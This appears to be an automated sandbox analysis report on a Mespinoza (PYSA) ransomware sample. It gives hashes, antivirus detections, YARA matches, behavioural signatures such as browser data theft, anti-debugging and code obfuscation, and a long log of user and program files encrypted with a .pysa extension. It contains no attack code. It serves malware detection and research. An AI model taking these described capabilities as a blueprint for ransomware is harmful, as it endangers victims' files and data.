Loading ...

Play interactive tourEdit tour

Analysis Report 6hFKK8UQi7.bin

Overview

General Information

Sample Name:6hFKK8UQi7.bin (renamed file extension from bin to exe)
Analysis ID:322355
MD5:b6dd099b4c51edae5ea0c867ff2f12a7
SHA1:f13800d747ca3d79785f373af3ce098a0298a6d7
SHA256:f0939ebfda6b30a330a00c57497038a54da359e316e0d6e6e71871fd50fec16a
Tags:MespinozaPYSAransomware

Most interesting Screenshot:

Detection

Mespinoza
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mespinoza ransomware
Creates files in the recycle bin to hide itself
Modifies existing user documents (likely ransomware behavior)
Tries to harvest and steal browser information (history, passwords, etc)
Writes many files with high entropy
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Installs a Chrome extension
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • 6hFKK8UQi7.exe (PID: 3412 cmdline: 'C:\Users\user\Desktop\6hFKK8UQi7.exe' MD5: B6DD099B4C51EDAE5EA0C867FF2F12A7)
    • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • OpenWith.exe (PID: 6716 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
6hFKK8UQi7.exeJoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.470657904.0000000000AEA000.00000004.00000020.sdmpJoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security
      00000000.00000000.205056782.000000000141A000.00000002.00020000.sdmpJoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security
        00000000.00000003.287795640.0000000000B0B000.00000004.00000001.sdmpJoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security
          00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmpJoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security
            Process Memory Space: 6hFKK8UQi7.exe PID: 3412JoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.6hFKK8UQi7.exe.13c0000.0.unpackJoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security
                0.2.6hFKK8UQi7.exe.13c0000.0.unpackJoeSecurity_MespinozaYara detected Mespinoza ransomwareJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: 6hFKK8UQi7.exeAvira: detected
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 6hFKK8UQi7.exeVirustotal: Detection: 52%Perma Link
                  Source: 6hFKK8UQi7.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EA350 CryptGenRandom,__CxxThrowException@8,0_2_013EA350
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EA3F0 new,CryptReleaseContext,0_2_013EA3F0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EA4F0 CryptReleaseContext,0_2_013EA4F0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013E9FC0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,0_2_013E9FC0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EA130 CryptAcquireContextA,GetLastError,0_2_013EA130
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EA310 CryptReleaseContext,0_2_013EA310
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EA2F1 CryptReleaseContext,0_2_013EA2F1
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_01418BB1 CryptReleaseContext,0_2_01418BB1
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013C9500 wsprintfW,FindFirstFileW,wsprintfW,_wcsstr,_wcsstr,FindNextFileW,FindClose,_wcsstr,0_2_013C9500
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_0140C916 FindFirstFileExA,0_2_0140C916
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013C8F21 __EH_prolog3_GS,GetLogicalDriveStringsW,GetDriveTypeW,0_2_013C8F21
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Readme.READMEJump to behavior

                  Spam, unwanted Advertisements and Ransom Demands:

                  barindex
                  Yara detected Mespinoza ransomwareShow sources
                  Source: Yara matchFile source: 6hFKK8UQi7.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000002.470657904.0000000000AEA000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.205056782.000000000141A000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.287795640.0000000000B0B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6hFKK8UQi7.exe PID: 3412, type: MEMORY
                  Source: Yara matchFile source: 0.0.6hFKK8UQi7.exe.13c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6hFKK8UQi7.exe.13c0000.0.unpack, type: UNPACKEDPE
                  Modifies existing user documents (likely ransomware behavior)Show sources
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile moved: C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docxJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ.pdfJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docxJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile moved: C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.pdfJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile moved: C:\Users\user\Desktop\GAOBCVIQIJ.xlsxJump to behavior
                  Writes many files with high entropyShow sources
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files\Google\Chrome\Application\85.0.4183.121\Installer\chrome.7z.pysa entropy: 7.99999121641Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.pysa entropy: 7.995147777Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.pysa entropy: 7.99386931373Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf.pysa entropy: 7.99182842725Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf.pysa entropy: 7.99128052642Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf.pysa entropy: 7.99943954042Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.pysa entropy: 7.99398086152Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf.pysa entropy: 7.99437407371Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf.pysa entropy: 7.99902900977Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf.pysa entropy: 7.99894222246Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf.pysa entropy: 7.99421156946Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf.pysa entropy: 7.9988654946Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf.pysa entropy: 7.99921071118Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf.pysa entropy: 7.99970935701Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.pysa entropy: 7.99473733454Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf.pysa entropy: 7.99093663222Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel1.xls.pysa entropy: 7.99892925626Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel2.xls.pysa entropy: 7.99938977932Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel3.xls.pysa entropy: 7.99968905427Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\Ocomprivate.zip.pysa entropy: 7.99374926063Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SAMPLES\SOLVSAMP.XLS.pysa entropy: 7.99405273348Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi.pysa entropy: 7.99974514259Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Adobe\ARM\S\ARM.msi.pysa entropy: 7.99972887798Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp.pysa entropy: 7.99999197416Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.pysa entropy: 7.99993316169Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab.pysa entropy: 7.99998667313Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Oracle\Java\installcache\baseimagefam8.pysa entropy: 7.99997162062Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa entropy: 7.99996441225Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab.pysa entropy: 7.99977967176Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\cab1.cab.pysa entropy: 7.99982801968Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\cab1.cab.pysa entropy: 7.99996355413Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa entropy: 7.99996038532Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa entropy: 7.99996447931Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa entropy: 7.99981460404Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab.pysa entropy: 7.99996092466Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab.pysa entropy: 7.99964442938Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa entropy: 7.99958588697Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa entropy: 7.9998406774Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab.pysa entropy: 7.999956506Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa entropy: 7.99460555212Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa entropy: 7.99460835002Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa entropy: 7.99409563915Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa entropy: 7.9953579596Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa entropy: 7.99407054257Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa entropy: 7.99413076591Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa entropy: 7.99444405763Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa entropy: 7.99427091638Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa entropy: 7.99374180893Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa entropy: 7.99442018984Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa entropy: 7.99429498689Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa entropy: 7.9949495485Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\Default\NTUSER.DAT.pysa entropy: 7.9981762519Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms.pysa entropy: 7.99952097674Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms.pysa entropy: 7.99944641319Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.pysa entropy: 7.99423239094Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.pysa entropy: 7.99822454572Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Temp\ArmUI.ini.pysa entropy: 7.99819152962Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol.pysa entropy: 7.99997153623Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx.pysa entropy: 7.9999304037Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.pysa entropy: 7.99993943025Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.pysa entropy: 7.99993497691Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.pysa entropy: 7.99993891554Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.pysa entropy: 7.99322106775Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Temp\SetupExe(202007230953501D8).log.pysa entropy: 7.99880173897Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma.pysa entropy: 7.99978355658Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma.pysa entropy: 7.99976052064Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico.pysa entropy: 7.99453121399Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1.pysa entropy: 7.99802870671Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index.pysa entropy: 7.99808254569Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.pysa entropy: 7.99407852392Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Media History.pysa entropy: 7.99433862993Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links.pysa entropy: 7.99484727051Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.pysa entropy: 7.99098427092Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_1.pysa entropy: 7.99815382676Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\index.pysa entropy: 7.99801283112Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache.pysa entropy: 7.99337286773Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store.pysa entropy: 7.99966456162Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store.pysa entropy: 7.99392705228Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store.pysa entropy: 7.99978632633Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlUws.store.pysa entropy: 7.99173221101Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1.pysa entropy: 7.99820848294Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index.pysa entropy: 7.99796618826Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat.pysa entropy: 7.99492216943Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749CFD-12B4.pma.pysa entropy: 7.9999497977Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749DC8-E1C.pma.pysa entropy: 7.99995038205Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0.pysa entropy: 7.9945941029Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store.pysa entropy: 7.99976254023Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlHighConfidenceAllowlist.store.pysa entropy: 7.99822866649Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store.pysa entropy: 7.994075967Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.pysa entropy: 7.99454755789Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.pysa entropy: 7.99468185731Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_background.js.pysa entropy: 7.99979253876Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_window.js.pysa entropy: 7.9984339564Jump to dropped file
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeProcess Stats: CPU usage > 98%
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EBAB00_2_013EBAB0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F01600_2_013F0160
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F60A60_2_013F60A6
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013D00E00_2_013D00E0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_014023690_2_01402369
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013D43700_2_013D4370
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013D03400_2_013D0340
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_014043D90_2_014043D9
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F65A20_2_013F65A2
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F05F00_2_013F05F0
